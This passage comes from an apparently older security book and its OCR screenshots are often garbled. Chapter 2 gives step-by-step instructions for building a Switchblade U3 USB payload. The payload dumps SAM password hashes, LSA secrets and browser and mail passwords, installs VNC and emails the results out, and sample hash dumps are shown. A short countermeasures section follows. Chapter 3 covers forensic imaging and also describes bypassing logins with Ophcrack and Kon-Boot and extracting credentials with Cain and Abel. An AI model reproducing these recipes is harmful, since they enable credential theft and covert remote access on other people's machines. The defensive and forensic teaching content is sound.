MDS Sum:e30c256dc1f76e753b9e297dc27d5c31 


<] 


& 


In order to use Switchblade and the Universal Customizer, you will need a USB drive from 
Sandisk with U3 technology. Caution: Performing these steps will alter your Sandisk U3 partition. 
To add a malicious payload to your U3 partition: 


1. Double click on the GonZors_SwitchBlade-V2.0 folder. Right click on USCUSTOM.ISO 
and select Copy. 

2. Double click on the Universal. Customizer folder. Double click on the Bin folder. Delete the 
U3CUSTOM.ISO file and paste the one from the GonZors_SwitchBlade-V2.0 folder. The 
size of the USCUSTOM.ISO file should be 13,720 KB. 

3. Locate the Universal Customizer.exe file and double click on it. Read the agreement and 
accept it if you agree to the terms. Click Next. 


{ U3 Customizer Removable Disk a) m 


The maker of this application holds no 

responsibility for any device or software 
Introduction damages. By selecting the option Accept 
3 below and clicking Next you are using this 
software at your own risk. This software 


Backup 
should be compatible with all U3 Devices, 


4 although if it doesnt work with your U3 
Customizing Device and damages it than the author of 
5 this application is not responsible. 


Complete 


@ Accept C Decline 


Obtaining Windows Passwords @ 79 


4, Read the important warnings and click Next at Step 2 after verifying that all U3 applica- 
tions are closed. Click Next. Do not eject during this process! 


| U3 Customizer Removable Disk (1:) er) | 


Welcome to U3 Customizer. Follow the instructions to 
customize your U3 smart drive. 


Ay IMPORTANT: 
(1) 


Close all U3 Smart applications, Sa eR us 

Backup that access your U3 smart drive. 

4 (2) Ejecting your U3 smart drive or shutting down the 
computer before the process is complete may damage 

Customizing the device, 


5 Click Next to continue. U3 Customizer will now close all 
Complete currently running U3 Smart applications. 


5. During Step 3 your data on your U3 drive will be backed up to a zip file. Set a password on 
the file. (It will not accept a blank password.) Click Next. 


CI ITTNMNSC 


All data on your U3 smart drive will be backed up to a 
password-protected ZIP file created by U3 Customizer. After 
the customization is complete, your data will be restored 
automatically. 


<U3-Backup-050909-0000 1 7F9AC622512.zip> will be saved 
to the Following location: 


[ C:\Documents and Settings|Def aul! My Documents 
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6. During Step 4, the U3 drive will be formatted. Do not eject during this process. 


| US Customizer Removable Disk (I:) | Ow | 


fl 


Disclaimer 
2 


WARNING: 


(1) Do not eject your U3 smart drive or shut down the 
computer until the customization is complete. 


(2) Do not run U3 smart applications, or applications that 


access files on the U3 smart drive while U3 Customizer is 
running. 


D er ( ) crea a 


7. Once you receive this message, your U3 partition has a nasty payload! The light on the drive 
will most likely be off. 


( uo customizer nenova MOV 


Please remove and re-insert your 
U3 smart drive for the settings to 
Customizing take effect, 


8. Never put this drive in another person’s system. You may do it on your own system. I have 
heard of cases where a hacker will stick a picture of their wife or family on the thumb drive 
and load their USB drive with the payload to extract information (see Figure 2.1). This is a 
good reason you should never insert a USB drive you find in the parking lot into your system! 
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Figure 2.1 A picture of a cute kid on a USB drive. 


9. Remove and reinsert the thumb drive into your system. Right click on the U3 CD and select 
Explore. Double click on the System folder. Double click on the SRC folder. Notice all of 
the files that are utilized to harvest information from a person's system. These files cannot be 
deleted or quarantined by antivirus. 


Favorite Links 

| © Documents 4 se 
k 

| IE. Pictures |) CACERT.PEM 

B Music f=] CACHEDUMP.EXE 
| voe» [&]puH.ves 
f=] FGDUMP.EXE 
i=] FIREPASSWORD.EXE 


Folders 


BE Desktop 
IBI Administrator 
Ji Public 
1S Computer 
&, Local Disk (C) 
Cx Local Disk (D:) 
cx DATA (E) 
eS DVD RW Drive (F:) 
eS) CD Drive (G:) 
CD Drive (H:) U3 
Ji SYSTEM 
be SRC 
b HS 
Ji vnc 
CD LAUNCHPAD.ZIP 
lig WINDOWS? (E) 
& DVD Drive (:) 
e» Removable Disk (K:) 
aR Nero Scout 
&* Network 
Control Panel 
5 Recycle Bin 
ji 


2 
3 
24 
5 


32 items 


[&]GO.BAT 

EB IEPV.EXE 

E] IMOKAV.EXE 
[2] LIBEAY32.DLL 
[@] LSTARGET.DLL 
ÉA MAILPV.EXE 
EI MSPASS.EXE 
FA NETPASS.EXE 
[8] NSPR4.DLL 

(@) NSS3.DLL 

[a PLC4.DLL 

(@) PLDS4.DLL 

[E] PORTQRY.EXE 
&& PRODUKEY.EXE 
43) PSPV.EXE 

f=] PWDUMP.EXE 
Eses 

SBS2 

(&] SEND.BAT 

[8] SOFTOKN3.DLL 
(| SSLEAY32.DLL 
d3]VNC.REG 

(&] WGET.EXE 

193 WIFIKE.EXE 

W WUL.EXE 


-|«[ m 


10. To finish setting up the Switchblade program, copy the SBConfig-V2.0.18.exe file from the 
GonZors SwitchBlade-V2.0 folder to your Sandisk U3 thumb drive. Double click on the 
SBConfig-V2.0.18.exe file on the thumb drive. Set the email address and the password for 
the email account. Click the Select All Payload Options radio button. Click the following 
additional two options: Turn U3 Launch Pad On and Turn and Turn PL On. Verify that 
these radio buttons are now set to Turn PL Off and Turn U3 Launch Pad Off. Click Update 
Config and Quit. 
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r Payload Options r HakSaw Setup 


Iv. Dump System Info Email to: 
IV Dump Extemal IP defenseblackarts@gmail.com 
Email from: 


Iv. VNC Install 

Iv. HakSaw Install 

Iv Dump Wifi Hex 

Iv. Dump SAM (PWDUMP) 
Iv Dump SAM (FGDUMP] 

Iv. Dump Network Passwords 
Iv Dump Mail Passwords 

Iv Dump Firefox Passwords 
Iv. Dump IE Passwords 


r Extemal IP URL 


MUT c //Ap.gonacz28 oom nde dt 


Iv Dump Cache 


Iv Dump LSA Secrets Tum PL Off | 
Iv. Dump Product Keys 

Select All Payload Options 
Iv Dump URL History 
KV Dump Updates List Deselect All Payload Options | 
Iv. Dump Network Services Reset Default Settings | 


Iv Dump Port Scan 


The tools that will be added to the U3 payload include the following: 


B Dump system info: Lists the computer name and user logged on. 


Hos : ¢lient32 
Pri : 


Node Type : Unknown 
IP Routing Enabled : NO 
WINS Proxy Enabled 


Ethernet adapter wall: 


Connection-specific DNS suffix . : 

Description : Marvell Yukon 88E8056 PCI-E Gigabit Ethernet Controller 
Physical Address : 00-13-72-2F-87-62 

Ohcp Enabled : 

IP Add 

Subnet Mask 

Default Gateway 

DNS Servers 
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B Dump external IP: Will provide the public IP address. This is needed to connect to the sys- 
tem remotely from the Internet. 


Externa] IP dumped 
96. 234.173.100 


W HakSaw install: Installs HakSaw program. 


t ‘wer 

: aabbccddee 

: ä»łýĵî 

: Realtek RTL8187 wireless 802.11b/g 54Mbps USB 2.0 Network Adapter 
1 (7A6ADF10-5CO05-4EDÓ6-AECB-50089531C20B) 


al M ) 


W Dump SAM (FGDUMP) extracts usernames and their corresponding password hashes 
from the SAM file using the FGDUMP program. 

W Dump SAM (PWDUMP) extracts usernames and their corresponding password hashes 
from the SAM file using the PWDUMP program. 
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-+ 
gig and the mighty group at foofus. net 
kun's life just a bit easier 

Gopyr taht (c) 2007 fizzgig and foofus.net 

fg ump comes with ABSOLUTELY NO WARRANTY! 

s free software, and you are welcome to redistribute it 
under certain conditions; see the COPYING and README files for 
more information. 


Starting dump on 127.0.0.1 


ww Beginning local dump ** 
OS (127.0.0.1): Microsoft windows xP Professional Service Pack 2 (Build 2600) 
Passwords dumped successfully 


Failed servers: 
NONE 


Successful servers: 
127.0.0.1 


Total failed: O 
Total successful: 1 


Administrator :500:9219888A0010C8E14A3B108F3FA6CB6D:E19CCF75EE54E06806A5907AF13CEF42::: 
default :1008:E52CAC67419A9A224A3B108F3FAGCB6D : 8846F 7EAEESFB117AD06BDD830B7586C: : : 
Guest:501:NO PASSWORD YW Wetewete wete w k W hewwe tetee W : NO PASSWORD V WW he he be We We We We ee Re Re Ree WO Y 
HelpAssistant:1000:75C91D69FA17846A1DF2269E7FB10C80:885558830A6748F374E6D8C5641441F3::: 
IUSR.CLIENT32:1009:20C202ABC4 6C54A0DE3D8DDF1F03ABA3 : 7CB57846954261CD0592095968CFD6837::: 
root :1007:E52CAC67419A9A224A3B108F 3FA6CBOD : 8846F 7EAEEBFB117AD06BDD83087586C : : : 
SQLAgentCmdExec :1011 : 81E5FFB87704FAD24A3B108F3FAGCBÓD : 64C395BD5629DCA1779ABDACFAEDÓ6CA 8 
SUPPORT. .388945a0:1002:NO PASSWORDY^eetrteieveienenennme i BE982600CB56C246E7B9F3693E4FF06 
—Vwmware.user. .:1005:NO PASSWORD Yu wwwwwwwwwwwuwwwwww EC R13AD4BCA6E06A3427260585EE0E92 


Dump network passwords: Dumps passwords used to connect to Windows shares, and so on. 


Dump mail passwords: Harvests passwords from Outlook, Outlook Express, and Windows 
Mail. 
Dump IE passwords: Dumps usernames and passwords from Internet Explorer. 


https ://www. google. com/accounts/servicelogin 
: Autocomplete 
: Registry 
: jvarsalone 
: NOTREALPASSWORD 


http: //twitter. com 
Autocomplete 
Registry 

: jvarsalone 

: NOTREALPASSWORD| 
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Dump Firefox passwords: Dumps usernames and passwords from Mozilla Firefox. 

Dump messenger passwords: Finds usernames and passwords from messenger programs like 
Yahoo and AIM. 

Dump LSA secrets: Can include various usernames and passwords from the local system. 
Dump product keys: Obtains product keys for the operating system and software applica- 
tions like Microsoft Office and Adobe Acrobat. 

Dump URL history: Provides a “roadmap” of websites the user has browsed and the dates 
that those websites were visited. 


Obtaining Windows Passwords W 85 


Ele Edt Format View Help 


Pages visited in week starting 8/31/2009 
Pages visited at mail.google.com 


mail. google. com 

Pages visited news. google.com 
news. google. com 

Pages visited www. google. com 
www. google. com 

Pages visited wyw. wireless. att.com 
www. wireless, att.com 


B Dump update lists: Lists patches that have been installed to the system. Hackers want to 
know this so they know how a particular system is vulnerable. 'The option to uninstall the 
update from the command line uninstall is also listed if available. 


: administrator 
Installation Date : 9/22/2009 
Display version : 20090308.140743 
Update Type : Update 
Operating System : windows XP 
web Link : http: ym ort.microsoft. con? kbI deles 
Uninstall Comman Ps uninstNspuninst.exe 


a | 


B Dump network services: Will explain which network services are running on a particular 
box, such as FTP and HTTP. In this case, VNC is listening because it was installed by the 
payload. 


Active Connections 


Proto Local Address Foreign Address State 
TCP 0.0.0.0:5800 0.0.0.0:0 LISTENING 
[winvnc. exe] 


TCP 0.0.0.0:5900 0.0.0.0:0 LISTENING 
[winvnc. exe] 


a a 


Creating log file called 3:\system\Logs\CLIENT32\CLIENT32_TEMP, log 


Processing local system's ports... 


TCP/UDP Port to Process Mappings 


Local IP state Remote IP:Port 
TIME WAIT 
LISTENING 
LISTENING 


-168.1.200 

+ 168.1. 200 

-168.1.200 

0.0.1 
-0.0 LISTENING 
0.0 LISTENING 
J 
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Countermeasures 


inst the Black Arts 


Programs like Switchblade and Amish are nasty and can harvest your personal information and 
extract your passwords. There are several measures that can be taken to protect your computer 


from a USB payload: 


1. Do not put any unfamiliar USB devices into your system. 


2. Keep your antivi 


rus enabled at all times and your definitions up to date. 


3. Turn off autorun. 


To turn off the autorun feature of the Windows operating systems, perform the following steps: 


1. On a computer running Windows 2000, XP, or 2003, click on the Start button and type 
GPEDIT.MSC. On Vista, 2008, or Windows 7 click on the Pearl, go up to Start Search and 
type GPEDIT.MSC. 


= Type the name of a program, folder, document, or 
* Internet resource, and Windows wall open it for you. 


Qpen: |GPEDIT.[MSC — — 


2. On a computer running Windows 2000, XP, or 2003, click on Computer Configuration, 
Administrative Templates, System, and double click the Turn off AutoPlay option. On a 
computer running Vista, 2008, or Windows 7, click on Configuration, Administrative 
"Templates, Windows Components, AutoPlay Policies, and double click the Turn off AutoPlay 


option. 


3 Local Computer Policy =f Local Computer Policy 


4 jf Computer Configuration 


z a Computer Configuration > G Software Settings 


s 
E 
G 


+) 


> _) Windows Settings 


Software Settings 4 | Administrative Templates 


" , > |) Control Panel 
Windows Settings > EZ] Network 
"m" à J Prin 
Administr ative Templates Ml Siem 
" P ] Wind c 
C Windows Components V all ActiveX inatoter Service 
[2 J Application Compatibility 
m System _ AutoPlay Policies 


On the Turn off AutoPlay Properties box, click the Enabled radio button. This will turn off 


autoplay for all drives. 
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Turn off Autoplay Properties X 
Setting | Explain 


Él Turn off Autoplay 


O Not Configured 
© Enabled 
O Disabled 


Turn off Autoplay or: All dives 


Supported on: At least Microsoft Windows 2000 


Previous Setting Next Setting 


Summary 


Passwords are extremely valuable in protecting any information that is stored electronically. While 
many computer applications may use encryption and claim that it will take 100 million years to 
break the encryption, the applications are often only as strong as the password the user chooses. 
Passwords should have a minimum length of 8 characters and have a combination of uppercase 
characters, lowercase characters, and special characters. 

Even the most secure passwords can be revealed if users allow hackers to get physical or remote 
access to their systems. There are tools out there like Cain and Abel, FEDUMP, and PWDUMP, 
which will dump the password hashes. Once a user has the password hashes from a Windows 
operating system, they can use tools like the rainbow tables or the website nediam.com.mx to find 
the passwords for the corresponding hashes. 

Other risks associated with passwords include the fact that they can be captured by software 
and hardware key loggers. And, as you will find out in the next chapter, forensic tools can be used 
to recover passwords from the page file and hibernation file of various operating systems. 


Chapter 3 


Imaging and Extraction 


Introduction 


Computer forensics is one of the fastest growing fields in information technology. The reason for 
this is almost everything is being electronically stored on some type of media. People’s personal 
computers contain a wealth of information about the individuals that use them. Items such as 
photographs, browser history, usernames, passwords, Word documents, and Excel spreadsheets 
can reveal a lot of facts about an individual’s identity and life. A company’s computers can con- 
tain databases with customers’ names, addresses, social security numbers, and information about 
credit card accounts. Storage of electronic media goes well beyond computers. People store music, 
videos, emails, and contact lists on their iPhones and other mobile devices. Individuals can also 
store information on gaming consoles like the PlayStation 3, which comes with a hard drive. 
Finally, some of the newer cars like BMWs come with a hard drive. As our society continues to 
move away from paper records and relies on electronic devices to store their information, the abil- 
ity to extract that information becomes more critical. 

Computer forensics tools are used by law enforcement to examine what is on the media of 
a person suspected of committing a crime. The evidence could either help to convict or exoner- 
ate that person. Examiners will look at documents, pictures, emails, videos, browsing history, 
and any other type of artifact you can find on a computer. What is also important is not just 
what people store, but what they try to hide. Not only will examiners look at what the suspect 
had in their recycle bin, they will also look at the user's deleted files and folders, if they can be 
recovered. 

Hackers can use the techniques of computer forensic examiners to wreak havoc on an indi- 
vidual or a company. By making a forensic image of a person’s hard drive, an attacker can have a 
bit-by-bit copy of that person’s data. This will include every file and folder on that hard drive as 
well as the recoverable deleted files and folders. The worst part is, if properly executed, a person 
would not be able to know that their drive had been accessed. Once a drive has been imaged, the 
attacker can then use an open source tool called Live View to boot that image and view that per- 
son’s operating system in a virtualized environment. Ifa person can make a forensic copy of a hard 
drive, they will have unfettered access to all information stored on that system. 
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Computer Forensic Tools 


There are both open source and commercial computer forensic tools. Some commercial 
computer forensic tools tend to be extremely expensive and could wind up setting a person 
back several hundred or thousand dollars. Some of the most commonly used commercial tools 
include Encase from Guidance Software, FT'K from Access Data, and X-Ways Forensic from 
X-Ways Software Technology AG. There are two good open source tools that allow you to 
perform forensic analysis of an image, PTK and Autopsy. Unfortunately, the open source tools 
are more difficult to configure and use and do not have nearly as many features as the com- 
mercial ones. 


Imaging with FTK Imager 


There are several tools that can be used to make a forensic copy of a drive. Some of these tools 
are command line utilities while others are graphical user interface (GUI) based. There are 
several reasons for making a forensic copy of a hard disk or other media. After an “image” has 
been made, the examination is performed on the forensic copy, not the original media. If the 
original is altered or changed after the time of the acquisition, the original state of the evidence 
at the time it was acquired would be preserved. 

The next question that is logical to ask is "If someone within law enforcement copies your drive 
and examines the copy, how do we know they did not plant the evidence?" 

After the media has been acquired, it can be hashed. Hashing is an extremely accurate calcu- 
lation that produces a mathematical value in hexadecimal. If the hash value is the same for the 
original media and the copied media, the images are forensically equivalent. 

If you are not very comfortable with Linux or the command line, there are some GUI tools 
that can be used to acquire an image of a disk. FT'K Imager Lite from Access Data is a tool you 
can use within Windows that will allow you to make a physical copy of a disk. It is available 
for download at the following link from the Access Data website: http://www.accessdata.com/ 
downloads/current_releases/imager/Imager%20Lite%202.6.1.zip. In order to make a copy, you 
will need an external USB drive. I bought one that holds a terabyte of data (1024 GB) at Costco 
for about $100. The drive you use to store the image should always be greater than or equal to 
the size of the disk you are imaging. In order to accommodate large image sizes, use the NFTS 
file system on the disk. If the disk is blank you can right click on it and format it NTFS in 
Windows. 


Note: Never make forensic copies of someone else’s media without their permission or the proper 
legal authority. 


The following steps are needed to make a copy of a disk using FTK Imager Lite: 


1. Download the FTK Imager Lite program from the Access Data website to your external 
hard disk. Unzip the program so it is usable. 

2. Double click on the FTK Imager file. 

3. From the File menu, select Create Disk Image. This will allow you to take a physical or logi- 
cal image of the disk. A physical image will be larger but may include additional items that 
the user attempted to delete. 
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SA AccessData FTK Imager 2.6.1.62 


Select Source 


r- Please Select the Source Evidence Type 
(* Physical Drive 


C Logical Drive 


C Image File 


© Contents of a Folder 


{logical file-level analysis only: excludes deleted. unallocated. etc.) 


f^ Femico Device [multiple CD/DVD) 


5. At the Select Drive screen, select the drive you want to make an image of. This is usually 
labeled PHYSICALDRIVEO. Click Finish. 


Select Drive 


~ Source Drive Selection 


Please select from the following available drives: 
WAPHYSICALDRIVEO - VMware Virtual IDE Hard Drive [5 


« Back Cancel | — Hep | 


6. At the Create Image screen, click the Add button. Removing the verify check will save lots 
of time if you are in a hurry. 
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Create Image 


Iv. Verify images after they are created — [^ Precakulate Progress Statistics 
[^ Create directory listings of all files in the image after they are created 


ae | cea] 


7. At the Select Image Type screen, select Raw(dd). A dd image is a bit-by-bit copy. An E01 
image is a proprietary format developed by Guidance Software. 


Please Select the Destination Image Type 
@ Raw (dd) 
(C SMART 


C E01 


oe uem] cm |o | 


8. Click Next at the Evidence Item screen (unless you are doing an acquisition for an agency 
that requires such data). 

9. At the Select Image Destination screen, browse to the root of your USB mass storage device. 
For the filename, put firstimage.dd. Specify 0 for image fragment size. If your USB mass 
storage device was FAT32, you could split the image up because FAT32 has a file size limit 
of slightly less than 4 GB. Click Finish. 


Select Image Destination 


'agmenk Size (MB) | 0 
'agment. 


Image Fr: 
For Raw and E01 formats: 0 = do not fr. 
Compression (0=None, 1 Fastest, ..., 9=Smallest) [ a 


ems os me | om] 
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10. Remove the check next to “Verify images after they are created” and click Start. 


Create Image 


r- Image Source 


| MAPHYSICALDRIVEO 


r Image Destination(s) 
E:\firstimage.dd [raw/dd] 


Add... | Edt | Remove | 


[^ Verify images after they are created — [^ Precalculate Progress Statistics 
[^ Create directory listings of all files in the image after they are created 


Cer ] c | 


Live View 


Live View works with most versions of Windows as well as Linux and Mac OS X. Once a dd image 
has been created, you can use a tool called Live View to boot the image up into a VMware envi- 
ronment. Booting the image will allow you to browse through the files and folders on the system. 
However, you will not be able to view deleted files within the image. To view the deleted files within 
the dd image, you will need a forensic tool like FTK, PTK, Autopsy, EnCase, or X-Ways. 

Perform the following steps prior to installing Live View: 


1. Download and install Java from Sun Microsystems at the following link: http://javadl.sun. 
com/webapps/download/AutoDL?Bundleld=34066. 

2. Download the VMware Virtual Disk Development Kit from VMware at the following link: 
http://wwwwmware.com/support/developer/vddk/. Click on the Download VDDK link. If you 
are a new user to VMware site, you will need to register so you can get access to that download. 

3. After you register and log in click the Yes radio button to agree to the EULA. Download the 
EXE for Windows. 

4. Double click on the VDDK install file. 

5. Click Next at the Welcome screen for VMware VDDK. 


ie VMware Virtual Disk Development Kit 


Welcome to the installer for VMware Virtual 
Disk Development Kit 


The installer wil install VMware Virtual Disk Development Kit on 
your computer. To continue, click Next. 


WARNING: This is protected law and 
ITTTTTITT. popen by copyright 


@ vmware 
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6. Read the terms of the license agreement and click accept if you accept them. Click Next. 
7. Click Next to accept the default installation location. 

8. Click Install. 

9. Click Finish at the Installer Complete screen. 


Perform the following steps to install Live View: 


1. Download Live View from the Sourceforge at the following link: http://sourceforge.net/ 
projects/liveview/files/ (get the latest public installer EXE file). 

2. Double click on the Live View Installer file. 

3. Click Next at the Setup Wizard. 


È Live View 0. 7b Setup 


Welcome to the Live View 0.7b 
Setup Wizard 


This wizard will guide you through the installation of Live 
View 0,7b, 


It is recommended that you close all other applications 
before starting Setup, This will make it possible to update 
relevant system files without having to reboot your 
computer. 


Click Next to continue, 


4. Read over the license agreement and click “I agree" if you agree. 

5. Click Next to choose the default installation location. If you already have VMware installed 
on your system, skip the rest of the steps. If no instance of VMware is installed on your 
system, click OK and a copy of VMware Server will be downloaded to your system. This is 
a free product but you must go to the VMware website (http://www.vwware.com) to register 
and get a serial number for your free product. 
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© Live View 0.7b Setup 


1 Hre view rodres other rd ar Wiroro Woron >t. The free VMware Server will now be | 
downloaded and installed because no compatible VMware installation could be | 


Cx] 


6. Click Next at the VMware Server install screen. 


i= VMware Server 


RO Welcome to the installation wizard for 
E VMware Server 


" The installation wizard will install VMware Server components 
on your computer, To continue, dick Next. 


VMware Server 


WARNING: This program is protected by copyright law and 


7. Click “I accept the terms” in the license agreement if you accept them. 
8. Verify the Complete radio button has been selected and click Next. 
9. Click OK if you receive an error about IIS (Internet Information Services). 
10. Click Next to accept the default destination folder. 
11. Click Next to the warning about Autorun. 
12. Click Install. 
13. Enter your serial number and click the Enter radio button. 
14. Click Finish for VMware Server, then click Finish for Live View. 


Perform the following steps to boot the image up using the Live View program: 


1. Double click on the LiveView icon on your desktop. 
2. Select 512 MB for the RAM size field. 

3. Select the operating system. 

4, Browse to the location of the image file. 


Note: If you are using Vista or Windows 7 and have user account control (UAC) enabled, store 
the image in the Public folder. 


5. Select an empty directory for the VM config files. 
6. Click Start. 
7. Click No to make image file read only. 
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RAM Size 
[512 
Microsoft Windows XP 


Select Your Image or Disk 
© Image File(s) O Physical Disk 
I:\firstimage.dd.001 


(Select Output Directory For VM Config Files — 
CAxp 


What do you want to do? 


© Launch My Image © Generate Config Only 


Perform the following steps to add a network card and VMware tools to the virtual machine: 


1. Power the machine off. 


2. Add a network card by clicking Edit Virtual Machine Settings and clicking Add, select the 
network adapter, click Next, and choose 


Hardware 
Hard Disk 
(SOCDjDVD Drive 
Hj Floppy Drive 
JL 

®) Sound Card 
USB Controller 
Serial Port 
Parallel Port 
Generic SCSI Device 


a. NAT or bridged if you want the machine on the Internet. Click Finish. 
b. Host-only if you do not want the machine on the Internet. Click Finish. 
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3. Click OK, then power on this virtual machine. 


‘Windows Help 
;m (>) S@B DBS DEB 65 


welcome 


0 drectInput to tis VM, ck side or press Cre, 


4, At this point, if there is a password required for logon, you will need to boot to a Live CD. 
To do this, power off the virtual machine by hitting the square red button under the File 
menu. Double click the CD/DVD icon under devices. Click the Use ISO image file radio 
button, click Browse, and locate the ISO image of Ophcrack on your system. Click OK. 


Device status 

[v] Connected 

[7] Connect at power on 

Connection 

(Use physical drive: 
Auto detect (G:) 


(S) Use ISO image file: 


| C:\opharack-xp-ivecd2.3.C [v] E rows.. 3 
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3x 


6. 


Click Power on this virtual machine, then immediately click your mouse in the VM window 
and hit the F2 key until you enter the BIOS screen. Go over to Boot. Select the CD-ROM 
drive and click the + key two times. Press F10 to save and exit. Select Yes to save configura- 
tion changes now and exit. 


CD-ROM Drive 


If Ophcrack does not find the password, you can use the sethc.exe or Utilman.exe hacks 
from Chapter 1 to gain system access and reset the password. Or, just use the Kon-Boot CD 
to log in without having the password. 


7. After the system starts up and you log on, from the menu, select VM and choose install 


8. 


VMware Tools. The VMware Tools will allow you to move files in and out of the virtual 
machine. Reboot after you have installed. 
Drag and files you need from the VM into your host system. 


Perform the following steps to extract usernames and passwords from the VM: 


1. 


Wo Oo N 


On your host machine, download Cain and Abel from oxid.it at the following link: http:// 
www.oxid.it/downloads/ca, setup.exe. 


. Drag the setup file into the VM. Disable any AV if it is on in the VM. 

. Run the Cain and Abel setup program. 

. Open the Cain program. 

. Under the area of cached passwords, click the blue plus sign to find usernames and pass- 


words. Try other areas such as LSA Secrets, Wireless Passwords, IE7 Passwords, Windows 
Mail Passwords, and so on. 


Ele view Configure Tools Help 
asodül *uys*uummgEgO9350? f 


Outlook Express Deleted Account 
Outlook Express Deleted Account 
Outlook Express Deleted Account. 
Outlook Express Deleted Account 
Outlook Express HTTP Mall Account 


Outlook Express Deleted Account 
Outlook Express SMTP Account 
Outlook Express POP3 Account. 
Outlook Express Deleted Account 
Outlook Express NNTP Account 
Outlook Express Deleted Account 
Outlook Express Deleted Account 
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6. If you are unable to find any passwords, another tool like Helix can be used. To use Helix, 
right click on the small CD-ROM icon in the right hand corner of the VM and select Settings. 
Select the Use ISO image file radio button, and click Browse. Locate the Helix2009R1.iso 
file and double click on it. 

7. When Helix auto launches, click Accept to the license agreement. Click on the third icon 
from the top, and browse to the third page of the incidence response tools. 


* HELIX2009R1 (01/06/2009) 


Incident Response 


e 


8. Cyde through the different password viewers until you recover any usernames and passwords. 


*& Network Password Recovery DER) 
File Edt View Help 


GA 83 ET 39 3 


Last Written 

10/25/2007 8:13:47 PM 
2/2/2009 1:36:20 PM 
7/1/2009 12:04:14 PM 
12/29/2008 12:57:58 PM 


While Live View is a very useful forensic tool, it will not allow you to recover any files that were 
deleted or items in slack space. In order to recover those types of items, we will need a forensic tool 
like EnCase, FTK, PTK, X-Ways, or Autopsy. 


Deleted Files and Slack Space 


When items are deleted from file system, they are not really deleted. Instead, what happens is 
the space the file occupies is marked as available on the on a disk. Forensic tools can be used 
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to recover those files if a new file has not yet been stored in the area where the previous file 
existed. Once a new file has been written to the area of the disk that the previous file occupied, 
the file cannot be fully recovered. That is one reason why when people ask me to recover their 
deleted files, I tell them to leave their computer alone until I get there. Any activity on the disk 
might cause new files to overwrite the available space on the disk where the deleted file was 
originally stored. 

Slack space on a disk often winds up being a goldmine for computer forensics investigators. 
In contrast, slack space often winds up being the Achilles’ heal for criminals. A sector, usually 
512 bytes, is the smallest unit of a disk that can be addressed by the disk controller. In contrast, 
the operating system will write to a cluster. Clusters are usually comprised of several sectors (the 
number of sectors can vary based on a file system). Let's say that for our example, clusters on a par- 
ticular operating system are 4K, or 4096 bytes. A file that is 8000 bytes will take up two clusters, 
as seen in Figure 3.1. 

If the file is deleted off the disk, the space in these clusters will be marked available. If the 
next file put in these clusters is 4097 bytes, then 3904 bytes of the original file will remain in the 
second cluster (8000—4096 = 3904 bytes). Figure 3.2 illustrates the part of the file that will be left 
in slack space. 

Even though it may seem odd that you are able to pull data out from “part” of the file, it can be 
done. Forensic tools will often pull out data from files you deleted months or even years ago. You 
will often be surprised what kind of information you can pull from the slack space. 


Forensic Tool Kit 


Forensic Took Kit (FTK) is a software forensic tool that will allow you to load an image. You 
can download the tool from the following link to try it: http://www.accessdata.com/downloads/ 
current_releases/ftk/FT K-Forensic_Toolkit-1.81.5.exe. While FTK is not a free product, you can 
examine 5000 items without having a dongle. This feature allows you to test the product and 
purchase it later if you like it. 


4096 4096 


| d 


8192 Bytes 


Figure 3.1 Two clusters. 


4096 4096 


8192 Bytes 


4097 bytes 3904 Slack Space 


Figure 3.2 Slack space illustrated. 
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AccessData FTK 


Thank you for evaluating AccessData's Forensic Toolkit (FTK®). This is a demonstration 
version of FTK. The following imitation is in effect: 


+ A maximum of $000 file tems can be analyzed 


I you wish to purchase a ful version of FTK, please contact AccessDute at 600-574-5199 or 
801-377-5410 
or visit our website at http: fjv. accessdata. com. 
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Perform the following steps to install FTK: 


NO BRwWN 


on 


. Double click on the FT K-Forensic_Toolkit-1.81.5.exe file. 

. Click Next at the Install Shield Wizard screen. 

. Read the license agreement over and click “I accept” if you accept it. Click Next. 
. Click Next to accept the default destination location. 

. Ensure that run the forensic tool kit is checked and click Finish. 

. Click OK to continue loading FTK without the KFF hash library. 

. Click OK to the demonstration warning. Click OK if you get another error. 

. Click Start a new case. 


AccessData F TK Startup 


© Start a new case 

O Open an existing case 

O Preview evidence 

O Go directly to working in program 


C Do not show this dialog on startup 


. Enter an investigator name, a case number, and a case name and click Next. 

. Click Next to Forensic Examiner Information. 

. Click Next to Case Log Options. 

. Click Next to Processes to Perform. 

. Click Next to Refine Case—Default. 

. Click Next to Refine Index— Default. 

. At the Add Evidence screen, click the Add Evidence to Case button. Verify that Acquired 
Image of Drive is selected and click Continue. 


Add Evidence to Case 


Type of Evidence to Add to Case 
© Acquired Image of Drive 
O Local Drive 


© Contents of a Folder 
O Individual File 


16. Browse to your firstimage.dd file and click OK. 
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Evidence Information 


Evidence Location: 
E:Mirstimage.dd.001 


Evidence Display Mame: 


Evidence Identification Name/Number: 


Comment: 


Choose time zone for evidence . 


17. Click Next and Finish. Wait for the image to load in the case. If there are more than 5000 
items in the image, they will not all load because this is a demo version. 


FTK Demo Version -- Add File Items 


jp) This demo version of FTK has reached its maximum of 5000 items and is stopping the addition of Fes, 
Tf you wish to add more than 5000 items, please purchase a full version of FTK. 


18. Click Deleted Files to view files that the user deleted and are still present on the disk. You 
can often tell a lot about someone by viewing their deleted files. 


{x AccessData FTK 1.81.5 DEMO VERSION -- c:\1\ 
Eile Edit view Tools Help 


| Ovevew [| Explore — | Graphics | E-Mel | Search 


(Evidence tems: 2) 
Bookmarked tems: 0 

(aare CES) _—| | 
Checked Items: D E Files: Graphics: 281) 
Unchecked Items: = ——| Rc 
Flagged Thumbnails: ^ O)[DeletedFies. — 8) 
(Other Thumbnails: — 281) Contem o —— 
Fitered In 5000 ) (Duplicate tems: 

(Fitered ot — — 0) ise — ir — 
[Unfitered )(  Fitered — ) (Flagged Ignore: SlackiFree Space: 1520) 
Data Carved Files: — 0) [Unknown T 1352 


Full Path 


$130 firstimage.dd\Part_1\NONAME-NTFS\System Vo... 

AD000001.PNF firstimage.dd\Part_1\NONAME-NTFS\System Vo... aa 

|A0000002. PNF. firstimage.dd\Part_1\NONAME-NTFS\System Vo. JPEGAFIF File 

40000003.PNF firstimage.dd\Part_1\NONAME-NTFS\System Vo... Unknown Fil... 

A0000004,.PNF firstimage.dd\Part_1\NONAME-NTFS\System Vo... Unknown Fil.. 

0000008 PNE firstimage. dd\Part_1\NONAME-NTFS\System Vo. Unknown Fil... 
firstimage. dd\Part_1\NONSME-NTFS\System Vo. 
firstimage.dd\Part_1\NONAME-NTFS\System Vo. 
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Imaging with Linux dd 


The dd program can be used to make a bit-by-bit copy of media. With a bit-by-bit copy, even items 
in slack space and your deleted files and folders will be copied to your destination media. Using 
